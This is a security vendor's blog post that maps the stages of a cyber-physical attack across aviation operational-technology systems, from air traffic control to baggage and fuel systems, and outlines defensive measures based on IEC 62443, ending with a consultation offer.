From tarmac to tower: Mapping the cyber-physical kill chain in aviation’s OT domains

Marking a new front line in aviation security

When people usually think of cybersecurity in aviation, their minds often leap to passenger data leaks, airline booking systems, or hacked inflight Wi-Fi. But beneath the surface of these familiar IT challenges lies a vastly more complex and relatively vulnerable ecosystem, the Operational Technology (OT) infrastructure that powers the physical backbone of aviation as we know it today.

From air traffic control (ATC) radars to automated baggage handling systems, refueling pumps to runway lighting, aviation is a carefully managed symphony of diverse and complex cyber-physical systems. And increasingly, all types of adversaries are learning to manipulate these invisible connections to achieve nefarious means. This is the age of the cyber-physical kill chain in aviation.

In our latest blog post, we will try and map the emerging aviation threat landscape, break down each domain in the aviation OT chain, and outline what must be done to secure aviation from tarmac to tower. Let’s get started.

The convergence of cyber-physical systems in aviation

Almost since inception, aviation's safety record has been built on redundancy, regulation, compliance, monitoring and rigorous engineering. But digitization has certainly changed the game:

· Legacy systems are now networked.

· Real-time data sharing is essential.

· Efficiency demands automation.

· Air gapped systems don’t automatically turn secure

· The focus on operational efficiency is not always translated into secure systems and processes

· Convergence of networks, systems, operations and access has led to security challenges at all levels from devices and networks to the infrastructure as a whole

This ongoing convergence of cyber and physical systems, while enabling gains in safety, speed, efficiency and cost, has created new interdependencies. Systems once isolated in space through connectivity are now connected to enterprise networks, cloud platforms, third-party support services, and remote diagnostics.

And that means vulnerabilities can now impact operations across systems that were never designed with cybersecurity in mind.

Why OT in aviation is different

Let’s start with a statement that you have heard a zillion times before. Unlike IT environments that prioritize data confidentiality, OT systems in aviation prioritize availability, operational predictability, safety, and physical accuracy. The failure of a baggage conveyor system or a gate bridge can disrupt hundreds of flights and even put lives at risk. The compromise of an Instrument Landing System (ILS) can cause catastrophic accidents.

Key challenges that security teams need to focus on in the aviation sector:

· Long lifespans of equipment (20–30 years on an average)

· Diverse proprietary protocols and vendors

· Strict compliance requirements (ICAO, IATA, FAA, EASA)

· High uptime requirements with minimal maintenance windows

· Multiple modes of connectivity

No wonder, the cyber-physical kill chain is uniquely dangerous here. In aviation, even a small digital breach can produce an outsized physical effect.

So, what do we mean by a cyber-physical kill chain?

The kill chain concept outlines various stages an adversary goes through in executing a cyberattack. These include Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control (C2), and Actions on Objectives.

In OT environments, especially aviation, this must be expanded to account for kinetic consequences.

Cyber-physical kill chain in aviation OT:

· Reconnaissance: Mapping airside systems, processes, operational dependencies, security levels and protocols.

· Initial access: Exploiting third-party maintenance window, stolen credentials or remote interfaces.

· Privilege escalation and lateral movement: Jumping across siloed networks and systems.

· Persistence and control: Establishing a long-term foothold in OT infrastructure either through extended loitering or via dormancy or both.

· Triggering physical impact: Causing delays, safety failures, or chaos.

· Anonymity or deception: Obfuscating origin, mimicking false system states.

Let’s now move on and explore this through the lens of actual aviation OT domains.

Mapping the OT aviation domain

Each airport and aircraft operation involves dozens of integrated OT subsystems. Here’s a simplified breakdown of the major domains:

Air Traffic Control (ATC) and Navigation Aids

Usually, a sovereign entity within the airport premises, these include radar, ADS-B (Automatic Dependent Surveillance–Broadcast), ILS, VOR/DME, and satellite communication.

Risks:

· Spoofing ADS-B signals to create phantom aircraft or bogeys to overload air traffic controllers.

· Jamming or denial-of-service (DoS) on navigation beacons.

· Unauthorized firmware updates on ATC systems.

· Insider threats with physical access to critical control centers.

· Displaying wrong aircraft information on the radar screen

· Blocking or hampering communication between aircraft and ATC

Sample kill chain in action: A threat actor uses a rogue drone to jam ILS signals during peak traffic, causing go-arounds and delays while appearing as a system glitch.

Airport ground operations

This includes runway lighting systems, airfield ground lighting (AGL), de-icing control, and weather systems.

Risks:

· Manipulating runway lighting to misguide pilots.

· Delaying apron area operations

· Tampering with meteorological sensors to provide false visibility data.

· Remote access exploits in lighting control panels.

· Turning off perimeter security systems

Sample kill chain: Malware infects a remote lighting control module, delaying flights during low-visibility conditions and lack of runway visibility.

Baggage Handling Systems (BHS)

These massive conveyor networks are fully automated, integrating barcode scanners, x-ray machines, sorters, and bag loaders.

Risks:

· Disruption of SCADA systems managing conveyors.

· Manipulation of scanning systems to smuggle restricted items.

· Physical damage via software-based overdrives.

Sample kill chain: A disgruntled insider injects code into the PLCs controlling sorting belts, creating mass misplacement of luggage for international flights.

Fuel systems

Automated fuel hydrant systems, refueler trucks, pressure control units, and communication interfaces fall under this.

Risks:

· Sensor tampering causing inaccurate fuel measurement.

· Manipulation of pressure valves to create delays or hazards.

· Remote access via mobile fueling apps or terminals.

Sample kill chain: A cyberattack targets the refueling logic controller, falsifying tank pressure readings and delaying departures until manual checks are completed.

Passenger boarding bridges and gate systems

These include automated gangways, gate allocation systems, and ground support interfaces.

Risks:

· Bridge positioning errors caused by manipulated sensors.

· Unauthorized access to control panels via weak authentication.

· System shutdowns during peak boarding.

· Accidents

Sample kill chain: A compromised bridge management system disables boarding bridges across a terminal, creating chaos and cascading flight delays.

Airport Building Management Systems (BMS)

Covers HVAC, fire alarms, elevators, escalators, and energy management, all of which are increasingly IP-connected.

Risks:

· Overheating of server rooms due to compromised HVAC.

· False fire alarms causing terminal evacuations.

· Surveillance camera loop playback to mask real intrusions.

Sample kill chain: An attacker manipulates environmental controls to overheat a backup server room, degrading surveillance and control systems in a phased attack.

Real-world incidents and indicators

Though few aviation OT incidents are publicly disclosed, recent events provide chilling precedents:

· ADS-B Spoofing in the Middle East: Ghost aircraft injected into radar systems.

· Frankfurt Airport Baggage System Outage: Suspected cyber sabotage caused massive delays.

· Remote ATC Tower Vulnerabilities: Research has revealed flaws in IP-based communications between unmanned ATC towers and regional airports.

· GPS manipulation to alter navigation: Multiple countries

These incidents reveal a common thread: low visibility, high interconnectivity, and high-impact consequences.

Securing the aviation OT kill chain

Here’s how airports, airlines, and regulators can defend against OT threats:

1. Conduct an OT-specific IEC 62443-based risk assessment

· Inventory all connected OT assets and interfaces.

· Identify criticality, access pathways, and potential cascading failures.

· Discover and remedy knowledge gaps

· Improve Security Level to 3

· Discover and break attack paths

2. Implement network segmentation

· Segment networks associated with critical systems where possible.

· Use secure DMZs and unidirectional gateways between IT and OT zones.

3. Enforce access control and monitoring

· Role-based access for OT systems.

· Session recording for remote vendors and third-party maintenance.

· Real-time anomaly detection using OT-aware tools.

· End sessions after a the passage of a pre-determined duration

4. Patch management and system hardening

· Prioritize updates during maintenance windows.

· Remove unused services and default credentials.

· Use firewalls and allowlists at device level.

· Maintain asset inventory with full information on assets including information on end-off-life

5. Adopt a threat-informed defense approach

· Map attack paths using threat modeling.

· Simulate cyber-physical kill chain scenarios (e.g., Red Team/Blue Team exercises).

· Integrate aviation-specific threat intelligence (APT actors, TTPs, malware families).

6. Enhance Incident Response Readiness

· Develop OT-centric playbooks (e.g., backup power loss, baggage system failure).

· Conduct joint IT-OT cyber drills.

· Coordinate with civil aviation authorities and law enforcement.

· Deploy Network Intrusion Detection Systems

Rethinking resilience: It’s not just about airports

The aviation kill chain isn’t isolated to airports. Airlines, OEMs, fuel suppliers, aircraft maintenance teams, and even catering services are part of this interconnected mesh. Aviation OT security must become:

· Holistic: Covering every operational link.

· Collaborative: With shared threat intelligence.

· Built-In: Designed from procurement to deployment.

As aviation becomes increasingly digital, cybersecurity must evolve from a compliance checkbox to an operational imperative. The next threat actor isn’t just after data, they may want to disrupt a gate, jam a navigation beacon, or halt a baggage system during a holiday rush.

Understanding and securing the cyber-physical kill chain isn’t just about avoiding attacks. It’s about ensuring trust in the world’s most critical mode of global transportation.

Because in aviation, even milliseconds and meters matter, and in OT, the cost of failure is measured not just in downtime, but in lives and livelihoods.

Learn more about cyber defense strategies for airports. Talk to us

Talk to us now for a free consultation on an IEC 62443-based cyber risk assessment for your OT systems and networks